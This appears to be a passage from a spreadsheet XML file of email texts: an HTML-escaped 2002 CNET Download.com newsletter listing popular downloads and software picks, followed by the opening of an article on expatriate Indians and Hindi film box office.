                    Week&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;1.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=69-CY-iIoWgaO4k_fuMoAH4OpRzLxFR" &gt;KaZaA
 Media Desktop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;1&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;11&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;2,251,808&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;2.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7HbF_ti6pURwMpopr9R" &gt;ICQ
 2002a&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;251&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;609,430&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;3.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3Vja0NGcTYjvQ8Rgn5rR" &gt;Morpheus&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;2&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;63&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;565,410&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;4.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkruy-L3TDtZs6swzdONiR" &gt;WinZip&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
   	&lt;!-- Last week --&gt;
   		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
   	&lt;!-- /Last week --&gt;
   	&lt;!-- Weeks on --&gt;
   		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;300&lt;/FONT&gt;&lt;/TD&gt;
   	&lt;!-- /Weeks on --&gt;
   	&lt;!-- Download count --&gt;
   		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;452,540&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;5.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTpl-yNWvbnY9y52GfwH4R" &gt;iMesh&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;5&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;116&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;353,287&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;6.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBmbHaKK74p01K7fy3rR" &gt;BearShare&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;6&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;74&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;177,000&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;7.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQBPe0crAP_kMFIM55iR" &gt;Ad-aware&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;7&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;44&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;156,911&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;8.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1reKyPQO_Iti64Q9t8PR" &gt;CNET CatchUp 1.31&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;10&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;115&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;114,250&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;9.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrd-cKr-pEvKY-qkCKnR" &gt;Qtraxmax&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;9&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;110,923&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;10.&lt;/FONT&gt;&lt;/TD&gt;
                   &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9ZKMucSkMRUVolYrBeR" &gt;Download Accelerator&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;8&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;135&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;109,139&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;!-- /Download count --&gt;
                &lt;TR&gt;
                  &lt;TD colSpan=5&gt;
                    &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                      &lt;TBODY&gt;
                      &lt;TR&gt;
                        &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
                          src="http://www.cnet.com/b.gif"
                    width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
              &lt;P&gt;&lt;FONT face="arial, helvetica"
              size=-1&gt;
   &lt;!-- /top ten --&gt;
   &lt;!-- TOP 5 MOVERS --&gt;
            &lt;A name=h3&gt;&lt;IMG height=19
            alt="This Week's Top Movers"
            src="http://www.cnet.com/i/nl/dl/sub_topmv.gif" width=300&gt;&lt;/A&gt;&lt;BR&gt;
            &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
            &lt;FONT face="arial, helvetica" size=-1&gt;
            Here are some of the
 fastest-rising downloads on our Most Popular list.
            &lt;BR&gt;
            &lt;/FONT&gt;
            &lt;BR&gt;
            &lt;TABLE cellSpacing=0 cellPadding=4 width="100%" border=0&gt;&lt;TBODY&gt;
            &lt;TR&gt;
            &lt;TD width="6%" height=36&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt; &lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;Top Movers&lt;/B&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;The Rundown&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;1.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YTQ0aYcvwlGWUTnaNtPR" &gt;LimeWire
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;As always, people continue to search for the perfect
       file-swapping client as this P2P tool moves up 3 spots to
       No. 13.&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;2.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%" align="middle"&gt;&lt;FONT
 face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtd9GPUw9MWz8AtIQwjjnR" &gt;QuickTime
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%" align="left"&gt;&lt;FONT face="ms sans serif,
 geneva" size=-2&gt;MPEG-4 technology, skip protection, and several other features in the latest update move Apple's media player up the list 5 spots to No. 29.
        &lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;3.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyTkwA9WhKPAKa1CPIuR" &gt;Tony Hawk's Pro Skater
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;One of the most popular games on
       any platform, this classic provides
       great gameplay as it volleys up the list 13 spots to No. 36.&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;4.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc35xphgfLHDx1984BOsR" &gt;WindowBlinds
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;Custom desktop skins prove popular
       as this utility rises up 4 spots to No. 41.&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;5.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQKp40uMzb-Byo4hJdlR" &gt;FlashGet
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;The latest update for this utility, which splits
       up files for faster downloading, makes a showing at No. 45.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;&lt;TD colSpan=3&gt;
            	&lt;TABLE cellSpacing=0 cellPadding=0 width="100%"
 border=0&gt;&lt;TBODY&gt;
            	&lt;TR&gt;
            	&lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            	&lt;/TR&gt;
            	&lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;/TD&gt;&lt;/TR&gt;
            &lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;FONT face="arial, helvetica" size=-1&gt;
            &lt;BR&gt;
            Want more? See our &lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOfNRwWOvAKcnvjbgw4R" &gt;&lt;b&gt;Top 50&lt;/b&gt;&lt;/a&gt;
 downloads.
            &lt;P&gt;
            &lt;/FONT&gt;
   &lt;!-- /TOP 5 MOVERS --&gt;
   &lt;!-- OTB ad block --&gt;
   &lt;!-- /OTB ad block --&gt;
   &lt;!-- picks of the week --&gt;
     &lt;P&gt;&lt;FONT face="arial, helvetica"
                size=-1&gt;
     &lt;A name=h3&gt;&lt;IMG height=19
       alt="Picks of the Week"
       src="http://www.cnet.com/i/nl/dl/sub_picks.gif"
       width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
       src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Audio&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7wviFcTRaT-Dc13yE_rR" &gt;DFX Collection 6.1
       &lt;/A&gt;&lt;/B&gt;&lt;BR&gt; &lt;FONT size=-2&gt;Free to try; $20 to buy&lt;BR&gt;File size:
       Varies by file&lt;BR&gt;Minimum requirements: Windows (all); Winamp, Sonique, Media Jukebox,
                          MusicMatch Jukebox, or RealPlayer/RealOne/RealJukebox
       &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;Give your software music player a little more bounce to the
    ounce with this set of audio enhancement utilities. The
    settings in DFX give you controls for adjusting fidelity,
    ambience, 3D surround, dynamic gain, and bass boost. New
    additions include processing that optimizes your music for
    headphone listening and a flexible skinning system with
    hundreds of customizable skins to choose from. There are
    separate versions of DFX available for Winamp, Sonique, Media
    Jukebox, MusicMatch, and Realmedia audio players.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Internet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8jpt0mH7c7YuNDxuyCiR" &gt;Opera 6.04
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt; &lt;FONT size=-2&gt;Free to try; $39 to buy&lt;BR&gt;File size:
 3.41MB&lt;BR&gt;Minimum requirements: Windows 95/98/Me/NT/2000/XP
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;Surf like a pro with the latest update of this high-performance Web browser. Opera gives you SLL support, tons of
    keyboard shortcuts, the choice of a single- or multiple-document interface, and a lot of other useful features. This
    update includes minor enhancements and bug fixes.&lt;p&gt;
       Want to review Opera? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw2tqlOMBjnbcumX6cvbPR" &gt;here&lt;/A&gt;.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Multimedia&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iIVBUIdtvDA4oSMpoLnR" &gt;3D Canvas 5.7
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Free&lt;BR&gt;File size:
 6.69MB&lt;BR&gt;Minimum requirements: Windows 95/98/Me/2000/XP, DirectX 8.0
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 Bring pixels to life with this intuitive 3D modeling and
    animation tool. 3D Canvas incorporates a drag-and-drop
    approach to 3D modeling and gives you tools to deform,
    sculpt, and paint 3D objects. You can also create animated
    scenes simply by positioning the objects within keyframes.
    Other features let you save your
    animated scenes as AVI files, customize the interface so only
    those items you use most frequently are visible, and more. Best of all, the
    standard version of 3D Canvas is a free product--learn to use
    it, then get the enhanced version for game development and
    rendering photo-realistic images.&lt;P&gt;
       Want to review 3D Canvas? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAl9HOoPffACEH5fCAiR" &gt;here&lt;/A&gt;.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Utilities&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXXmgAvxGZTscR7jeQrFPR" &gt;PrintMagic 1.0
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Free to try; $24.95 to buy&lt;BR&gt;File size:
 592K&lt;BR&gt;Minimum requirements: Windows 98/NT/2000/Me/XP
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 Make quick work of your clipboard notations and printing tasks
    with this simple and very handy app. PrintMagic allows you to
    quickly and easily select and print content from almost any
    application using a drag-and-drop interface or its innovative
    Printboard. Plus, the cost savings and productivity
    enhancements provided by PrintMagic are multiplied for any
    organization that uses many computers.&lt;P&gt;
       Want to review PrintMagic? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8bBoyS7JR1rqAFZcCnR" &gt;here&lt;/A&gt;.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Games&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81vQySE88g-rrsLKFK0uR" &gt;ChessRally 2.4
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Free to try; $20 to buy&lt;BR&gt;File size:
 8.58MB&lt;BR&gt;Minimum requirements: Windows 95/98/Me/NT/2000/XP
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 Play chess over the Internet, against the computer, or through
    e-mail with this full-featured game, which offers a
    customizable interface with free downloadable themes. If you
    get stuck, ChessRally even delivers move suggestions. Blue
    has nothing on you.&lt;P&gt;
       Want to review ChessRally? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZ0IM_iNGWF8w6YrPhsR" &gt;here&lt;/A&gt;.&lt;p&gt;
 &lt;!-- /picks of the week --&gt;
 &lt;!-- Leads Module --&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;!-- buzzworthy --&gt;
 &lt;!-- /buzzworthy --&gt;
 &lt;!-- overheard --&gt;
 &lt;A name=h4&gt;&lt;IMG height=19 alt="Overheard on Download.com" src=
 			 "http://www.cnet.com/i/nl/dl/sub_overh.gif" width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG
 			 height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;b&gt;Here are some representative responses from last week's question on who should take the blame for Web sites not being compatible in every browser:&lt;/b&gt;
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"Web builders should be doing as much as possible to support the broadest possible usage by their target audience"&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 A little over half the responses put the onus of compatibility on builders.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"There are far less browser makers than there are Web builders and users. So it doesn't make sense for users or Web builders to do that job does it?."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 After Web builders, browser manufacturers got the most blame, although this response makes the best argument.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"The ordinary users are one group most at fault since they tend to stick to only one browser."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 Few responses said users should take responsibility, as most respondents fall into the Web user category.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"As a professional designer, I say proprietary code is downright evil, no matter who it comes from--and no matter what nifty trick it does."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 Quite a number of Web builders wrote in, with many taking responsibility while noting the difficulty of testing in every browser.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"Because Web pages are viewed 90 percent of the time by IE it is understandable that the time spent to make a site compatible with the remaining tiny minority has to be justified."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 A few responses quoted server logs, making the point that it's not cost efficient to make sites compatible for people who choose a low-market share browser.
 &lt;!-- /overheard --&gt;
         &lt;p&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/table&gt;
 &lt;!-- /Main body content --&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=616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width=616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href="http://clickthru.online.com/Click?q=79-rsQHIEBf9L2-XiQmFz_e0CvgpaFR" &gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375"
 height="18" border="0" alt="Sign up for more free newsletters from
 CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;&lt;p&gt;
 &lt;A NOTRACK HREF="http://clickthru.online.com/Click?q=8e-VezcrMnFnTUQdia0kcLEkaU3EijOqdRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email='&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a
 href="http://www.cnet.com/subscription/0-16335-7-6770019.html"&gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYKHGl7fQffN5r5ls4rR"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width=616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width=616 bgcolor="#ffcc00" cellpadding="0" cellspacing="0"
 border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img
 src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="37"&gt;&lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXLHBpSh8FdMkmoOwzlR" &gt;&lt;img
 src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37"
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOozUDku3ufz1Jey2fP4R" &gt;&lt;font
 color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8ASAY8N-JM2mPpt29erR" &gt;&lt;font
 color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnXRRFQHpiaRL6DCwoliR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGSTCo_Nv0T0QkY6b7PR" &gt;&lt;font
 color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_FRyUfuo4I9yc99NcnR" &gt;&lt;font
 color="#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=616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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e415-03&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=39-7QkMnoICVpM1FTXcS8dXVNFfXdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Some notes on Bollywood movies hitting it big abroad
</t>
  </si>
  <si>
    <t xml:space="preserve">NRI Number One
 Expats help Hindi films make dollars and sense even at their own expense
 By JEANNE E. FREDRIKSEN
 The expatriate in films is nothing new. Casablanca starring Humphrey 
 Bogart as the suave, mysterious Rick in Morocco remains the top favorite 
 60 years after its release in America. Although expat characters' lives 
 are traditionally painted as being extraordinary, the simple fact that 
 they live "elsewhere" adds a sense of adventure, a dash of romance, and 
 a bit of wishful longing. However, expats have never made the kind of 
 impact on films that non-resident Indians (NRIs) have with Hindi cinema, 
 both at the box office and on the big screen.
 According to India's 2001 census, the country's population exceeded the 
 1 billion persons milestone, and there are approximately 11 million 
 Indians living, working, and studying elsewhere around the world. NRIs 
 have become a serious market for the Hindi film industry, particularly 
 in the U.K., where approximately 3 percent of the population is 
 Indian/Pakistani, and in the U.S., where 1.7 million out of 281.5 
 million people are Indian. The rupee box office is now augmented quite 
 handsomely by the dollar-and-pound box office, much to the delight of 
 directors and producers.
 Among the films reporting a half-to-three-quarters-of-a-million-dollar 
 box office in the U.S. or the U.K. are Aa Ab Laut Chalen (1999), Kaho 
